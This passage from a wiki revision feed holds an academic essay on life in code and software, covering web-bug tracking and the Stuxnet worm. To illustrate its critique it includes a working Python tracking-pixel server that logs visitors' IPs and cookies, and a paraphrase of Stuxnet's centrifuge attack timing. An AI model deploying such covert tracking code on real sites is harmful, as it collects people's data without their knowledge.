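            path = os.path.join(dirpath, name)
            try:
                ages.append((os.path.getmtime(path), path))
            except OSError:
                pass  # skip unreadable entries
    ages.sort()  # oldest modification times first
    return [(time.ctime(mtime), path) for mtime, path in ages[:count]]

for when, path in oldest_files(os.path.expanduser('~')):
    print(when, path)
&amp;lt;/pre&amp;gt; &lt;br /&gt;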
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4996</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4996"/>
		<updated>2012-06-21T11:16:33Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology, made up of disparate software ecologies, that we inhabit. As such we need to take account of this new computational environment and think about how today we live in a highly mediated, code-based world. That is, we live in a world where computational concepts and ideas are foundational, or ontological. Here, code and software become the paradigmatic forms of knowing and doing - to the extent that other candidates for this role, such as air, the economy, evolution, the environment, satellites, and so forth, are understood and explained through computational concepts and categories.&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has been highly successful in penetrating more and more into the lifeworld. Digital code/software has created, and continues to create, specific tensions in relation to old media forms, such as the disruption it has produced in the print, music and film industries, as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. It is a potential that is understood as relating to the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate, often theorised as a form of network politics. Indeed, as Deuze ''et al.'' have argued:&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. For example, 427 million Europeans (or 65 percent) use the Internet, and more than 9 in 10 European Internet users read news online (Wauters, 2012). These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers them.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; These computational devices, particularly mobile forms, also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life continues to expand, driven by the network effects of digital media. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane (see, for example, Hall, 2011).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences. Code/software are the materialisation of computationality, in that they are the medium through which structural features of computation are realised and mediated. For example, code/software disconnects the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system (see also Parikka, 2012). Called ‘fly-by-wire’ in aircraft design, this is in reality the condition of the computational environment we increasingly experience, and which I have elsewhere termed ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacrum lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. 
That is, the material form of code/software is difficult to theorise and understand due to its perceived invisibility or ethereality, while having concrete effects nonetheless. This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangles that yield only to certain prescribed forms of touch-based interface. Here I am thinking of physical keyboards and trackpads as much as of haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep - although it is useful to note that some theorists, such as Frabetti (2010), have problematised Hayles' understanding of code, print, and materiality.&amp;lt;br&amp;gt;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomenon of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs are automated data collection agents that are secretly included in the web pages we browse. Often held within a tiny one-pixel frame or image, far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior and send various information about the user back to their servers.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Originally introduced as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour and collect data and information about users has important privacy implications, but it also facilitates the rise of so-called behavioural marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Fortunately, we are seeing the creation of a number of useful software projects that allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company], it is described as:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code in the browser without the knowledge of the user; should that code be observed, it looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999):&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;http://ad.doubleclick.net/ad/pixel.quicken/NEW&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;http://media.preferences.com/ping?ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any&amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;group=register&amp;amp;amp;time=1999.10.27.20.56.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
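What such a tag actually does only becomes visible on the server. The following is a minimal sketch in Python of the server side of a web bug, my own illustration rather than any company's actual code: a small WSGI application that returns a one-pixel GIF whilst logging the identifying details that arrive with the request: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# A minimal sketch of the server side of a web bug: serve a 1x1 GIF
# and log the tracking data that arrives as a side effect of the fetch.
import logging
from wsgiref.simple_server import make_server

logging.basicConfig(level=logging.INFO)

# the smallest transparent 1x1 GIF
PIXEL = (b'GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00'
         b'!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00'
         b'\x01\x00\x00\x02\x02D\x01\x00;')

def tracking_pixel(environ, start_response):
    # everything of interest is a by-product of fetching the image
    logging.info('visit: ip=%s referer=%s agent=%s cookie=%s',
                 environ.get('REMOTE_ADDR'),
                 environ.get('HTTP_REFERER'),
                 environ.get('HTTP_USER_AGENT'),
                 environ.get('HTTP_COOKIE'))
    start_response('200 OK', [('Content-Type', 'image/gif')])
    return [PIXEL]

# run a demonstration server on port 8000
make_server('', 8000, tracking_pixel).serve_forever()
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;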
&amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again, Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)'; the data is not shared with third parties, but no information is given on data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initiative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users' desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second-guess, tempt, direct and nudge behavior in particular directions (see Parry, 2011). Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative frequency of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor is worth $189 at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) and $24 at [http://www.businessinsider.com/blackboard/google Google] (search), and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011). Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becoming extremely profitable. 
Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into four main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of a marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers (web site operators). Example: [http://www.burstmedia.com/ Burst Media] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
[[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2012)]] ''Image 1: Display Advertising Technology Landscape (Luma, 2012)''

Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients:
<blockquote>A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010).</blockquote>
Of course, one element missing from this typology is surveillance, and indeed it is no surprise that web bugs form part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto, and later confirmed in testimony to a U.S. House of Representatives subcommittee that it is 'still company practice to use e-mail bugs in certain cases' (Evers, 2006; Fried, 2006).

As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term "clear GIF" to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid attracting unwanted attention. Some of the current discussions over the direction of regulation on this issue have focused on the "do not track" flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the "do not track" header, and there is currently no legal requirement that they do so in the US or elsewhere (W3C, 2012). One can, however, see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that 'voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive' (Baker, 2012).

One of the newer, and perhaps indicative, directions of travel for these web bugs is [http://www.persianstat.ir/ PersianStat], an Iranian web tracking and data analytics website that claims to keep 'an eye on 1091622 websites'; it shows that this new code ecology is not a purely Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in the use of these tracker technologies. Pew (2012) found:
<blockquote>that 73 percent of Americans said they would 'not be okay' with being tracked (because it would be an invasion of privacy)… Only 23 percent said they'd be 'okay' with tracking (because it would lead to better and more personalized search results)… Despite all those high-percentage objections to the idea of being tracked, less than half of the people surveyed -- 38 percent -- said they knew of ways to control the data collected about them. (Garber, 2012; Pew, 2012)</blockquote>
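It is worth noting how technically trivial the "do not track" signal mentioned above is: a single HTTP request header. A minimal sketch of a tracker that voluntarily honours it (the helper function is hypothetical; nothing obliges any company to perform this check, which is precisely the regulatory gap):

 # The "do not track" flag is just an HTTP request header, DNT: 1.
 # A sketch of a tracker that (voluntarily) honours the opt-out.
 def should_track(headers):
     """Return False when the client has sent the opt-out header DNT: 1."""
     return headers.get("DNT") != "1"
 
 print(should_track({"DNT": "1"}))  # -> False: user opted out
 print(should_track({}))            # -> True: tracking is the default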
This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data, which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent to which users are simply not aware of the subterranean depths of their computational devices, and the ability of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device whilst giving the user the impression that they remain fully in control of the computer. As Garber observes, 'underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?' (Garber, 2012). This issue is helpfully illustrated by the next case study, of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function.
== '''Stuxnet''' ==
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its 'strike conditions', that is, the location it was designed to attack, and activated its 'digital warhead', which may monitor, damage, or even destroy its target. The name 'Stuxnet' is 'derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys': the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, such as a test facility to model a nuclear plant, to create and launch (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained:
<blockquote>Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b)</blockquote>
The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system, which it then plays back to the operators to disguise the fact that it is gently causing the centrifuges to fail. This is known as a 'man-in-the-middle attack' because it fakes industrial process control sensor signals so that an infected system does not exhibit abnormal behaviour and therefore does not raise the alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the act of sabotage, and in a targeted way, through the fatiguing of the motors; this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010), and a 'senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus' (Associated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June 2012, and hence hide its tracks. As Zetter explains:
<blockquote>once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)</blockquote>
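The timing logic Zetter describes can be paraphrased as a simple schedule of frequency steps. The sketch below is a hypothetical reconstruction in Python using only the figures quoted above; the real attack logic ran as Siemens PLC code, not anything like this:

 # A hypothetical paraphrase of the timing Zetter describes, as a simple
 # schedule of (frequency, duration) steps; only the figures quoted above
 # are taken from the source.
 NOMINAL, OVERSPEED, UNDERSPEED = 1064, 1410, 2     # Hz
 DAYS_27 = 27 * 24 * 60                             # minutes of dormancy
 
 def attack_schedule(cycles=2):
     """Yield (frequency_hz, hold_minutes) pairs for the two sequences."""
     for _ in range(cycles):
         yield (NOMINAL, DAYS_27)      # lie low for 27 days
         yield (OVERSPEED, 15)         # near the IR-1 rotor's limit
         yield (NOMINAL, DAYS_27)      # back to nominal; fatigue accrues
         yield (UNDERSPEED, 50)        # second sequence: drop to 2 Hz
         yield (NOMINAL, 0)            # restore and await the next cycle
 
 for hz, minutes in attack_schedule():
     print(f"hold {hz} Hz for {minutes} minutes")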
Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general-purpose attack: it was designed to unload its digital warheads under specific conditions against a specific target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine.

